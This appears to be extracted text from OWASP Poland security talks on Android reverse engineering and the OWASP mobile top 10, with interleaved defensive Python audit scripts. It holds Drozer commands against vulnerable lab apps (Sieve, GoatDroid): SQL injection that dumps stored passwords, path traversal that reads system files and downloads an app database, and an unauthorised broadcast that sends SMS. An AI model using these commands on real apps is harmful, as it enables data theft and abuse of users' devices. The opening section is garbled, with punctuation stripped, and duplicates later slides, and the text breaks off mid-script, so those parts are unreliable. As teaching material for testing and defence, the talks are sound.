bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Content providers attacks
bull Unrestricted access to app database
Content providers
dzgt run scannerproviderfinduris -a commwrexamplesieve Accessible content URIs contentcommwrexamplesieveDBContentProviderKeys contentcommwrexamplesieveDBContentProviderPasswordscontentcommwrexamplesieveDBContentProviderPasswords
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --vertical
Content providers attacks
bull SQL injection
Content providers
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --selection unrecognized token ) (code 1) while compiling SELECT FROM Passwords WHERE ()
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --projection FROM Key--| Password | pin || thisismypassword | 9876 |
Content providers attacks
bull Path traversal
Content providers
One interesting real-life example httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-application
dzgt run appproviderread contentcommwrexamplesieveFileBackupProvideretchosts127001 localhost
dzgt run appproviderdownload contentcommwrexamplesieveFileBackupProviderdatadatacommwrexamplesie vedatabasesdatabasedb homeuserdatabasedbWritten 24576 bytes
Content providers demo Content providers
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low boot completed headset plug etc Though most of the broadcast receivers are originated by the system applications can also announce broadcasts
Broadcast receivers
Broadcast receivers
bull If receiver accepts broadcasts from untrusted sources app is at risk
Broadcast receivers
Broadcast receivers attacks
Typical fail authorization
bull Enumerate receiversbull Determine how the receiver handles the
actionbull Send intent and enjoy
Broadcast receivers
Broadcast receivers attacks
ltreceiver androidname=broadcastreceiversSendSMSNowReceiverrdquoandroidlabel=Send SMS gt ltintent-filtergt
ltaction androidname=orgowaspgoatdroidfourgoatsSOCIAL_SMS gt ltintent-filtergtltreceivergthellipltuses-permission androidname=androidpermissionSEND_SMS gt
Sample manifest from GoatDroid
Broadcast receivers
Broadcast receivers attacks
public void onReceive(Context arg0 Intent arg1) context = arg0 SmsManager sms = SmsManagergetDefault() Bundle bundle = arg1getExtras() smssendTextMessage(bundlegetString(phoneNumber) null bundlegetString(message) null null) UtilsmakeToast(context ConstantsTEXT_MESSAGE_SENT ToastLENGTH_LONG)
The following is the code that determines how the receiver handles the orgowaspgoatdroidfourgoatsSOCIAL_SMS actions
Broadcast receivers
Broadcast receivers attacks
run appbroadcastsend --action orgowaspgoatdroidfourgoatsSOCIAL_SMS --component orgowaspgoatdroidfourgoats orgowaspgoatdroidfourgoatsbroadcastreceiversSendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
Broadcast receivers
General defenses for App Components
Applies for all abovementioned itemsbull Setting androidexported attribute to false
(only this user ID as the current app will be able to access the activity)
bull Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
Referencesbull httpdeveloperandroidcomguidecomponentsindexhtmlbull httpdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull http
resourcesinfosecinstitutecomandroid-hacking-security-part-1-exploiting-securing-application-components
bull httpresourcesinfosecinstitutecomandroid-hacking-security-part-2-content-provider-leakagebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-3-exploiting-broadcast-receiversbull httpyinzhicaoorgcoursesf15cse343443slidesmobilesecuritypdfbull httpswwwsafaribooksonlinecomlibraryviewandroid-security-cookbookbull httpswwwmwrinfosecuritycomsystemassets937originalmwri_drozer-user-guide_2015-03-23pdfbull httpsmanifestsecuritycomandroid-application-security-part-5bull httpsmanifestsecuritycomandroid-application-security-part-8bull httpswwweecsberkeleyedu~dawpapersintents-mobisys11pdfbull httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-applicationbull httpsgithubcomtanprathanMobileApp-Pentest-Cheatsheetandroid-application-penetration-testing
Thank you
bull For additional questions or just to stay in touch c0rdis
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection - example
Insufficient transport layer protection - few facts from reality
• According to the FireEye research from July 17, 2014 among the 1000 most-downloaded free applications in the Google Play store
Source: https://www.fireeye.com/blog/threat-research/2014/08/ssl-vulnerabilities-who-listens-when-android-applications-talk.html
Insufficient transport layer protection - mitigations
• Any sensitive data MUST be transferred over TLS
• How to do it properly? Follow the rules: https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage – what it is
• Simple words definition: the OS/frameworks put sensitive information in an insecure location on the device
• Important note: insecure data storage talks about a developer's conscious efforts to store data in an insecure manner, while unintended data leakage refers to OS/framework-specific quirks which can cause data leakages
Unintended data leakage – common leakage points
• URL caching
• Copy/paste buffer caching
• Logging
• Analytics data sent to 3rd parties (e.g. ads sending GPS location)
Unintended data leakage – how to find
• Extract data from leaking content providers using Drozer:
dz> run app.provider.finduri <package_name>
• Use logcat to verify what is being logged, using ADB:
adb logcat [output filter]
• Use a listener (Burp/Wireshark) to monitor what is being sent to 3rd parties
• Use Intent Sniffer to see if any confidential data is sent via Intents
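The logcat step above, turned into a detection script as an added example (not part of the slides): it parses `adb logcat -v threadtime` lines and flags messages carrying credentials, bearer tokens, e-mail addresses, GPS fixes or card numbers, so a pre-release run of the app tells you which classes leak. The log lines are constructed for the example; the patterns are a starting heuristic, not a complete list.

```python
import re

# Logcat "threadtime" format: date time pid tid level tag: message
LOGCAT_LINE = re.compile(
    r"^(?P<date>\d{2}-\d{2})\s+(?P<time>[\d:.]+)\s+(?P<pid>\d+)\s+(?P<tid>\d+)\s+"
    r"(?P<level>[VDIWEF])\s+(?P<tag>[^:]+):\s?(?P<msg>.*)$"
)

# Data that should never reach the log. Dict order only fixes the order of
# findings within a single line.
SENSITIVE_PATTERNS = {
    "credential": re.compile(r"\b(?:password|passwd|pwd|pin)\s*[=:]\s*\S+", re.I),
    "bearer_token": re.compile(r"\bBearer\s+[A-Za-z0-9\-_.=]{16,}"),
    "email": re.compile(r"\b[\w.+-]+@[\w-]+\.[\w.-]+\b"),
    "gps_fix": re.compile(r"-?\d{1,2}\.\d{4,}\s*,\s*-?\d{1,3}\.\d{4,}"),
    "card_number": re.compile(r"\b(?:\d[ -]?){15}\d\b"),
}


def scan_logcat(lines):
    """One finding per (line, pattern) hit: which tag leaked what kind of data."""
    findings = []
    for raw in lines:
        m = LOGCAT_LINE.match(raw)
        if not m:
            continue  # buffer separators, kernel lines, garbage
        msg = m.group("msg")
        for kind, pattern in SENSITIVE_PATTERNS.items():
            hit = pattern.search(msg)
            if hit:
                findings.append({"tag": m.group("tag").strip(), "level": m.group("level"),
                                 "kind": kind, "match": hit.group(0)})
    return findings


def leaking_tags(lines):
    """Tags (roughly: the logging classes) that emitted at least one sensitive value."""
    return sorted({f["tag"] for f in scan_logcat(lines)})


# Constructed sample output, shaped like `adb logcat -v threadtime`.
SAMPLE_LOGCAT = [
    "02-24 10:15:01.123  1234  1234 D LoginActivity: POST /login password=hunter2 user=alice",
    "02-24 10:15:01.456  1234  1250 I OkHttp: Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.c29tZS1ib2R5.c2lnbmF0dXJl",
    "02-24 10:15:02.001  1234  1234 D LocationSvc: fix lat,lon = 51.1079, 17.0385",
    "02-24 10:15:02.500  1234  1234 V Analytics: event=screen_view name=MainActivity",
    "--------- beginning of system",
    "02-24 10:15:03.000  4321  4321 W ActivityManager: Force finishing activity com.example/.Crash",
]

if __name__ == "__main__":
    for f in scan_logcat(SAMPLE_LOGCAT):
        print(f"{f['level']}/{f['tag']}: {f['kind']} -> {f['match']}")
```

Run it over a capture taken while exercising login, payment and location features; anything it reports is a candidate for removal from release builds (or for the log call to be stripped by ProGuard/R8 rules).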
Unintended data leakage - demo
Unintended data leakage - mitigations
• NEVER log any sensitive information (observe what you're storing in crash logs)
• Disable the copy/paste function for sensitive parts of the application
• Disable debugging (android:debuggable="false")
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication – what it is
• Simple words definition: if you're able to bypass authentication and/or leverage your privileges then… your app has poor authorization and/or authentication
Poor Authorization and Authentication – how to find
• Try to bypass authentication by accessing exported activities using Drozer:
dz> run app.activity.start --component <component_name>
• Intercept traffic with Burp and modify parameters to log in as another user / see unauthorized content (e.g. by manipulating the device ID)
• Test the account lockout policy
• Test the strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication – real example
• A flaw in an application can become an entry point to compromise an operating system
• For example the Viber app: https://www.youtube.com/watch?time_continue=40&v=rScheIQDD0k
And always remember to…
• …stay reasonable when you're going to follow advice from the Internet…
Poor Authorization and Authentication - mitigations
• Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server side whenever possible
• Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a user's password on the device. It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography – what it is
• Simple words definition: using an insecure implementation, or implementing it in an insecure way
• Few reminders (yeah, I know you know it…):
  – encoding ≠ encryption
  – obfuscation ≠ encryption
Broken Cryptography – how to find
• Decompile the apk using dex2jar (or Luyten for a more verbose result) and review the jar file in JD-GUI
• Look for decryption keys (in an attacker-readable folder or hardcoded within the binary)
• Try to break the encryption algorithm if an application uses custom encryption
• Look for usage of insecure and/or deprecated algorithms (e.g. RC4, MD4/5, SHA1, etc.)
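The review steps above, and the hardcoded-password example a few slides later, as an added static check in Python (not code from the slides): it runs over decompiled Java source and flags what a reviewer looks for first: weak or deprecated algorithms, ECB mode, string-literal keys and passwords, and java.util.Random used for key material. The Java snippet is constructed for the example; javac inlines compile-time String constants, which is why a decompiler shows the key as a literal at the use site.

```python
import re

# (finding kind, regex over one line of decompiled Java). Constructed for this
# example; extend with the patterns relevant to your own code base.
RULES = [
    ("hardcoded_password", re.compile(r'(?:password|passphrase|secret)\w*\s*=\s*"[^"]{4,}"', re.I)),
    ("hardcoded_key", re.compile(r'new\s+SecretKeySpec\(\s*(?:"[^"]*"\.getBytes\(|new\s+byte\[\]\s*\{)')),
    ("hardcoded_iv", re.compile(r'new\s+IvParameterSpec\(\s*(?:"[^"]*"\.getBytes\(|new\s+byte\[\]\s*\{)')),
    ("ecb_mode", re.compile(r'Cipher\.getInstance\(\s*"[^"]*/ECB/[^"]*"')),
    ("weak_hash", re.compile(r'MessageDigest\.getInstance\(\s*"(?:MD2|MD4|MD5|SHA|SHA-1|SHA1)"')),
    ("weak_cipher", re.compile(r'Cipher\.getInstance\(\s*"(?:DES|DESede|RC4|ARCFOUR|Blowfish)(?:/[^"]*)?"')),
    ("weak_random", re.compile(r'\bnew\s+(?:java\.util\.)?Random\(')),
]


def audit_java_source(source):
    """Return findings with 1-based line numbers, in source order."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for kind, pattern in RULES:
            if pattern.search(line):
                findings.append({"line": lineno, "kind": kind, "code": line.strip()})
    return findings


# Constructed sample, shaped like JD-GUI/Luyten output for a database helper.
JAVA_SOURCE = """\
public class DbHelper {
    private static final String DB_PASSWORD = "s3cr3tDbPassw0rd";

    public static byte[] encrypt(byte[] plain) throws Exception {
        SecretKeySpec key = new SecretKeySpec("0123456789abcdef".getBytes("UTF-8"), "AES");
        Cipher cipher = Cipher.getInstance("AES/ECB/PKCS5Padding");
        cipher.init(Cipher.ENCRYPT_MODE, key);
        return cipher.doFinal(plain);
    }

    public static String checksum(byte[] data) throws Exception {
        MessageDigest md = MessageDigest.getInstance("MD5");
        return Base64.encodeToString(md.digest(data), Base64.NO_WRAP);
    }

    public static byte[] legacy(byte[] data) throws Exception {
        Cipher rc4 = Cipher.getInstance("RC4");
        byte[] iv = new byte[16];
        new Random().nextBytes(iv);
        return rc4.doFinal(data);
    }

    public static byte[] modern(byte[] plain, SecretKey key, byte[] iv) throws Exception {
        Cipher cipher = Cipher.getInstance("AES/GCM/NoPadding");
        cipher.init(Cipher.ENCRYPT_MODE, key, new GCMParameterSpec(128, iv));
        return cipher.doFinal(plain);
    }
}
"""

if __name__ == "__main__":
    for f in audit_java_source(JAVA_SOURCE):
        print(f"line {f['line']:>3}  {f['kind']:<18} {f['code']}")
```

The `modern` method is deliberately clean (AES-GCM, key passed in, IV supplied by the caller) and produces no finding; the point of the check is to shortlist lines for a human, not to prove the rest safe, so run it on every class dex2jar produced, not only the obvious crypto helper.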
Broken Cryptography - example
• An encrypted db is definitely a good idea…
Broken Cryptography - example
• …but not when you're hardcoding the password to decrypt it in code…
Broken Cryptography – real example
• NQ Vault
Broken Cryptography - mitigations
• Use known strong cryptography implementations
• Do not hardcode keys/credentials/OAuth tokens
• Do not store keys on a device. Use password-based encryption instead
M7 - Client side injection
Client side injection – what it is
• Simple words definition: malicious code can be provided as an input and executed by the application (on the client side)
• The malicious code can come from:
  – Another application via intent/content provider
  – Shared file
  – Server response
  – Third-party website
Client side injection – what to inject
• SQL injection to local db
• XSS/WebView injection
• Directory traversal
• Intent injection
A new Android's toy – the Intents
• An Android application can talk (Inter-Process Communication) to any other component (e.g. other application, system service, running a new activity, etc.) via special objects called Intents
Intent i = new Intent(Intent.ACTION_VIEW, Uri.parse("https://owasp.org"));
Intent i = new Intent(android.provider.MediaStore.ACTION_IMAGE_CAPTURE);
Client side injection – how to find
• SQL injections:
dz> run scanner.provider.injection -a <package_name>
• Data path traversal:
dz> run scanner.provider.traversal -a <package_name>
• Intent injections:
dz> run app.package.manifest -a <package_name>
dz> run app.activity.info -a <package_name>
dz> run app.service.info --permission null -a <package_name>
dz> run intents.fuzzinozer --package_name <package_name> --fuzzing_intent
Client side injection – real example
• The UniversalMDMClient (built-in application, Samsung KNOX – a security feature to separate personal and professional activities)
• A crafted URI with the "smdm" prefix allows remote installation of ANY application while the user thinks he's installing an update for UniversalMDMClient
• How it works in practice: https://www.youtube.com/watch?time_continue=56&v=6O9OBmsv-CM
Client side injection - mitigations
• Always validate any user input on the server side
• For internal communication use only explicit Intents
• Avoid using Intent-filter. Even if the Activity has the attribute "exported=false", another application can define the same filter and the system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling – what it is
• Simple words definition: if your session token can be guessed, retrieved by a third party or never expires, then you have a problem
Improper session handling – how to find
• Intercept requests with a proxy (e.g. Burp) and:
  – Verify if a session expires (copy a cookie and try to use it after 30 minutes)
  – Verify if a session is destroyed after the authentication state changes (e.g. switching from any logged-in user to another logged-in user)
  – Verify if you are able to guess any other session (e.g. it's easy to impersonate another user when the application uses the device ID as a session token)
Improper session handling – few facts from reality
• What we know is that "sessions have to expire"…
• …but how long should they REALLY last?
• According to an experiment, the average application session (counted from opening an app to closing it) lasts… 71.56 seconds
- http://www.mendeley.com/research/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
• Invalidate the session on the server side
• Set a session expiration time adjusted to your application
• Destroy all unused session tokens
• Use only high-entropy, tested token generation resources
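The four mitigations above as an added Python example (not from the slides): a server-side session store that issues 256-bit random tokens, expires them after an idle period you choose, destroys the old token whenever the authentication state changes, plus a heuristic that flags tokens which look like device identifiers rather than random values. The clock is injectable so expiry can be tested without waiting 30 minutes.

```python
import re
import secrets
import time

SESSION_TTL_SECONDS = 30 * 60  # tune to the application's own usage pattern


class SessionStore:
    """Server-side session table: the client only ever holds an opaque token."""

    def __init__(self, ttl=SESSION_TTL_SECONDS, clock=time.time):
        self.ttl = ttl
        self.clock = clock          # injectable for tests
        self._sessions = {}         # token -> (user, expires_at)

    def create(self, user):
        token = secrets.token_urlsafe(32)        # 256 bits from the OS CSPRNG
        self._sessions[token] = (user, self.clock() + self.ttl)
        return token

    def lookup(self, token):
        """Return the user for a live token, or None; expired tokens are dropped on sight."""
        entry = self._sessions.get(token)
        if entry is None:
            return None
        user, expires_at = entry
        if self.clock() >= expires_at:
            del self._sessions[token]
            return None
        return user

    def invalidate(self, token):
        """Server-side logout: the token is useless even if the client keeps it."""
        self._sessions.pop(token, None)

    def reauthenticate(self, old_token, user):
        """Any authentication state change destroys the old token and issues a fresh one."""
        self.invalidate(old_token)
        return self.create(user)

    def purge_expired(self):
        """Housekeeping for tokens nobody presented again after they expired."""
        now = self.clock()
        dead = [t for t, (_, expires_at) in self._sessions.items() if now >= expires_at]
        for t in dead:
            del self._sessions[t]
        return len(dead)

    def live_count(self):
        return len(self._sessions)


def weak_token_reasons(token):
    """Heuristics for tokens that are guessable or derived from device identity."""
    reasons = []
    if len(token) < 16:
        reasons.append("too short")
    if token.isdigit():
        reasons.append("digits only (IMEI/phone-number-like)")
    if re.fullmatch(r"[0-9a-fA-F]{16}", token):
        reasons.append("16 hex chars (ANDROID_ID-like)")
    if len(set(token)) < 8:
        reasons.append("low character diversity")
    return reasons


if __name__ == "__main__":
    store = SessionStore()
    t = store.create("alice")
    print("token:", t, "->", store.lookup(t))
    print("device-id-style token:", weak_token_reasons("a1b2c3d4e5f60718"))
```

`reauthenticate` is the hook for the "switch user" case from the how-to-find list: the old token must stop working at that moment, not when it would have expired on its own.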
Thank you
pawelrzepa@outlook.com
References
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risks
• https://github.com/ikust/hello-pinnedcerts
• http://www.exploresecurity.com/testing-for-cipher-suite-preference
• http://resources.infosecinstitute.com/android-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakage
• http://www.slideshare.net/JackMannino/owasp-top-10-mobile-risks
• https://manifestsecurity.com/android-application-security
• https://mobilesecuritywiki.com
• http://androidcracking.blogspot.de/2014/02/zerdeis-luyten-worthwhile-jd-gui.html
• https://www.acsac.org/2011/openconf/modules/request.php?module=oc_program&action=view.php&a=&id=111&type=3&OPENCONF=54jm3hh7laelc19qq6ernql5m2
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Mobile_Threat_Model
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Security_Testing
• https://www.owasp.org/images/7/77/Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl%2BMarian_Harbach%2BMathew_Smith.pdf
• https://www.ssllabs.com/ssltest
• http://www.slideshare.net/ibmsecurity/overtaking-firefox-profiles-vulnerabilities-in-firefox-for-android
• http://resources.infosecinstitute.com/cracking-nq-vault-step-by-step
• http://www.slideshare.net/ibmsecurity/pinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystack
• https://github.com/linkedin/qark
• https://www.mendeley.com/catalog/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
• http://blog.quarkslab.com/abusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerability.html
• http://www.bkav.com/top-news/-/view_content/content/46264/critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screen
• http://thehackernews.com/2014/05/microsoft-outlook-app-for-android.html
• https://drive.google.com/file/d/0BxOPagp1jPHWVnlzWGNVbFBMTW8/view?pref=2&pli=1
Reverse Engineering & Malware Analysis
Daniel Ramirez, OWASP Poland, 24.02.2016
Anatomy of an apk
Getting our apk file
• From the phone:
  – APKOptic
  – Astro File Manager
• Using ADB
• Use APKpure
Decompiling || Disassembling
• Decompiling – High Level – Java Code
• Disassembling – Low Level – Assembly Code
• Why Disassembling and not Decompiling?
Decompiling
DEX → JAR → JAVA
Decompiling - Dex2Jar
• dex2jar
  – Converts Dalvik bytecode (DEX) to Java bytecode (JAR)
  – Allows to use any existing Java decompiler with the resulting JAR file
Decompiling – Java Decompilers
• JD-GUI || Luyten
  – Closed source Java decompiler
  – Combined with dex2jar you can use JD-GUI or Luyten to decompile Android applications
• Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX → SMALI
Disassembling
• Apktool
  – Open source Java tool for reverse-engineering Android apps
  – Transforms binary Dalvik bytecode (dex) into Smali source
Signing apk
• Using signapk.jar:
java -jar signapk.jar certificate.pem key.pk8 your-app.apk your-app-signed.apk
• Using AppUse
Demo Time
Demo: Decompiling (Luyten)
Demo: Modify Smali Files
Demo
Content providers attacks
• SQL injection
Content providers
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'"
unrecognized token: "')" (code 1): , while compiling: SELECT * FROM Passwords WHERE (')
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM Key--"
| Password         | pin  |
| thisismypassword | 9876 |
Content providers attacks
• Path traversal
Content providers
One interesting real-life example: http://blog.seguesec.com/2012/09/path-traversal-vulnerability-on-shazam-android-application
dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
127.0.0.1 localhost
dz> run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data/data/com.mwr.example.sieve/databases/database.db /home/user/database.db
Written 24576 bytes
Content providers demo
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low, boot completed, headset plug, etc. Though most of the broadcast receivers are originated by the system, applications can also announce broadcasts.
• If a receiver accepts broadcasts from untrusted sources, the app is at risk
Broadcast receivers attacks
Typical fail: authorization
• Enumerate receivers
• Determine how the receiver handles the action
• Send intent and enjoy
<receiver android:name="broadcastreceivers.SendSMSNowReceiver" android:label="Send SMS">
    <intent-filter>
        <action android:name="org.owasp.goatdroid.fourgoats.SOCIAL_SMS" />
    </intent-filter>
</receiver>
…
<uses-permission android:name="android.permission.SEND_SMS" />
Sample manifest from GoatDroid
Broadcast receivers attacks
The following is the code that determines how the receiver handles the org.owasp.goatdroid.fourgoats.SOCIAL_SMS action:
public void onReceive(Context arg0, Intent arg1) {
    context = arg0;
    SmsManager sms = SmsManager.getDefault();
    Bundle bundle = arg1.getExtras();
    sms.sendTextMessage(bundle.getString("phoneNumber"), null, bundle.getString("message"), null, null);
    Utils.makeToast(context, Constants.TEXT_MESSAGE_SENT, Toast.LENGTH_LONG);
}
Broadcast receivers attacks
run app.broadcast.send --action org.owasp.goatdroid.fourgoats.SOCIAL_SMS --component org.owasp.goatdroid.fourgoats org.owasp.goatdroid.fourgoats.broadcastreceivers.SendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
General defenses for App Components
Applies to all above-mentioned items:
• Setting the android:exported attribute to false (only the same user ID as the current app will be able to access the activity)
• Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
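The two defenses above, turned into a manifest check as an added Python example (not from the slides or from GoatDroid): it parses an AndroidManifest.xml as decoded by apktool and lists the components other apps can reach without holding any permission, treating a component as exported when android:exported is "true" or when it declares an intent-filter and leaves the attribute unset (the default before API level 31). The manifest is constructed around the GoatDroid receiver shown earlier; the other components and the permission name are made up for the example.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
COMPONENT_TAGS = ("activity", "activity-alias", "service", "receiver", "provider")


def attr(element, name):
    """Read an android:-namespaced attribute."""
    return element.get(f"{{{ANDROID_NS}}}{name}")


def is_launcher_only(component):
    """MAIN/LAUNCHER activities have to be exported; that is not a finding."""
    filters = component.findall("intent-filter")
    if not filters:
        return False
    for f in filters:
        actions = {attr(a, "name") for a in f.findall("action")}
        if actions != {"android.intent.action.MAIN"}:
            return False
    return True


def audit_exported_components(manifest_xml):
    """Components reachable from other apps with no permission guarding them."""
    root = ET.fromstring(manifest_xml)
    findings = []
    for comp in root.find("application"):
        if comp.tag not in COMPONENT_TAGS:
            continue
        exported_attr = attr(comp, "exported")
        if exported_attr is None:
            # Implicit export: an intent-filter with android:exported unset
            exported = comp.find("intent-filter") is not None
        else:
            exported = exported_attr.lower() == "true"
        if not exported or (comp.tag == "activity" and is_launcher_only(comp)):
            continue
        permission = attr(comp, "permission")
        if comp.tag == "provider":
            permission = permission or attr(comp, "readPermission") or attr(comp, "writePermission")
        if not permission:
            findings.append({"type": comp.tag, "name": attr(comp, "name"),
                             "implicit_export": exported_attr is None})
    return findings


# Constructed manifest: the receiver from the GoatDroid slide, plus components
# showing the two defenses (android:exported="false", a custom permission).
SAMPLE_MANIFEST = """\
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="org.owasp.goatdroid.fourgoats">
    <uses-permission android:name="android.permission.SEND_SMS" />
    <application android:label="FourGoats">
        <activity android:name=".activities.Main">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />
                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>
        <receiver android:name="broadcastreceivers.SendSMSNowReceiver" android:label="Send SMS">
            <intent-filter>
                <action android:name="org.owasp.goatdroid.fourgoats.SOCIAL_SMS" />
            </intent-filter>
        </receiver>
        <receiver android:name="broadcastreceivers.InternalReceiver" android:exported="false">
            <intent-filter>
                <action android:name="org.owasp.goatdroid.fourgoats.INTERNAL" />
            </intent-filter>
        </receiver>
        <service android:name=".services.SyncService" android:exported="true"
            android:permission="org.owasp.goatdroid.fourgoats.permission.SYNC" />
        <provider android:name=".providers.NotesProvider"
            android:authorities="org.owasp.goatdroid.fourgoats.notes"
            android:exported="true" />
    </application>
</manifest>
"""

if __name__ == "__main__":
    for f in audit_exported_components(SAMPLE_MANIFEST):
        how = "implicitly via intent-filter" if f["implicit_export"] else "explicitly"
        print(f"{f['type']} {f['name']} is exported {how} and has no permission")
```

The SendSMSNowReceiver is reported because its intent-filter exports it with no permission, which is exactly what the `app.broadcast.send` command above relies on; the InternalReceiver keeps its filter but is not reported because android:exported="false" wins. Run this against the manifest of every build before release, and treat each finding as either "add android:exported=false" or "add android:permission".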
References
• http://developer.android.com/guide/components/index.html
• http://developer.android.com/guide/topics/manifest/manifest-intro.html
• http://resources.infosecinstitute.com/android-hacking-security-part-1-exploiting-securing-application-components
• http://resources.infosecinstitute.com/android-hacking-security-part-2-content-provider-leakage
• http://resources.infosecinstitute.com/android-hacking-security-part-3-exploiting-broadcast-receivers
• http://yinzhicao.org/courses/f15/cse343443/slides/mobilesecurity.pdf
• https://www.safaribooksonline.com/library/view/android-security-cookbook
• https://www.mwrinfosecurity.com/system/assets/937/original/mwri_drozer-user-guide_2015-03-23.pdf
• https://manifestsecurity.com/android-application-security-part-5
• https://manifestsecurity.com/android-application-security-part-8
• https://www.eecs.berkeley.edu/~daw/papers/intents-mobisys11.pdf
• http://blog.seguesec.com/2012/09/path-traversal-vulnerability-on-shazam-android-application
• https://github.com/tanprathan/MobileApp-Pentest-Cheatsheet#android-application-penetration-testing
Thank you
• For additional questions or just to stay in touch: c0rdis
OWASP top 10 mobile risks
Pawel Rzepa, OWASP Poland, 24.02.2016
Important notes
• The goal of this presentation is to provide you with basic knowledge about mobile risks and an easy methodology to find those risks in your applications
• If you want to add anything important/interesting and related to the topic – feel free to interrupt me :)
What are we going to talk about…
Before we start… the threat model
M2 - Insecure data storage
Insecure data storage – what it is
• Simple words definition: valuable pieces of data (e.g. passwords, cookies, personal information) are stored in the data stores on the device in an insecure (plain text or reversible encoding) format
Insecure data storage – what to look for
• Look for any sensitive information in:
  – SQLite databases (local)
  – XML data stores
  – Plain text configuration files
  – Cookie stores
  – SD card
Insecure data storage – how to find
• Install and run the application for some time
• Monitor changes on the sdcard before and after installing the application
• Analyze the package files at different stages:
adb pull /data/data/<apk_package_name>
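The three steps above as an added Python example (not from the slides). File permissions have to be checked on the device, because `adb pull` does not preserve them: the first function reads an `adb shell ls -l` listing of the app directory and reports regular files that any other app could read or write; the second parses a pulled SharedPreferences XML file for keys whose names suggest credentials kept in the clear. The listing and the preferences file below are constructed samples.

```python
import re
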